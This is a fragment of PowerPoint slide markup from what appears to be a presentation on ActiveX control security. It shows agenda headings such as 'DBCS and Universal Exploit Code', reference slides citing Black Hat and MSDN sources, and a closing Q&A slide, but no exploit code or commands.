                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49165" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="2889250"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12796"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Potentially Vulnerable Control Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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859155" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="2733675"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2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D5DDAF1-9026-4A32-942B-B216C1AB82AF}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5017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ko-KR" smtClean="0"/>
              <a:t>Reference(1/2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5018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ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cesar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Cerrudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, "Auditing ActiveX Controls", Black Hat Windows Security, 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>David Zimmer, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>COMRaider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”, “http://labs.idefense.com/software/fuzzing.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Frederic Bret-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Mounet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, "Automated Detection of COM Vulnerabilities", Black Hat USA, 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Sean Baxter, "COM Automation: Type Information(Part II)", 1999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http-equiv, http://www.malware.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ByteRage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, EXE2HTML, http://byterage.hackaholic.org/index.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Creating a binary file using debug.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean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42C34B6-1DFF-4FEB-AE89-3225CE8570E0}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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ko-KR" smtClean="0"/>
              <a:t>Reference(2/2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Matt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Pietrek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, "Improve Your Debugging by Generating Symbols from COM Type Libraries", Microsoft System Journal, Mar 1999.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Getting the Addresses of Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Microsoft Corporation, "Safe Initialization and Scripting for ActiveX Control", http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/safety.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Marc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Silbey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, Peter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Brundrett</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, "Understanding and Working in Protected Mode Internet Explorer", MSDN, Sep. 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Microsoft Corporation, "Developer Best Practices and Guidelines for Applications in a Least Privileged Environment", Sep. 2005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Sharon Cohen, Rob Franco, "ActiveX Security: Improvements and Best Practices", MSDN, Sep. 2006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116263" y="3036888"/>
            <a:ext cx="7577137" cy="865187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" smtClean="0"/>
              <a:t>Q&amp;A</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" smtClean="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" smtClean="0"/>
              <a:t>Email : sweetlie@etri.re.kr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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{909C7EC2-857B-45CE-BD65-260C4EC3DA0D}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123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ko-KR" smtClean="0"/>
              <a:t>1 Introduction to ActiveX Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124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/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2397125" y="1954213"/>
            <a:ext cx="6407150" cy="519112"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="16335E"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="306FCC"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="16335E"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449337" tIns="45654" rIns="91306" bIns="45654" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Introduction to ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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5126" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="2889250"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12796"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Potentially Vulnerable Control Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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5128" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="4833938"/>
            <a:ext cx="5446712" cy="439737"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Windows Vista and ActiveX Control </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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852998" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1889125" y="1809750"/>
            <a:ext cx="801688" cy="755650"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="852999" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="2733675"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="853001" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="4667250"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5133" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="5842000"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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853005" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="5686425"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="3898900"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DBCS and Universal Exploit Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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14" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="3743325"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
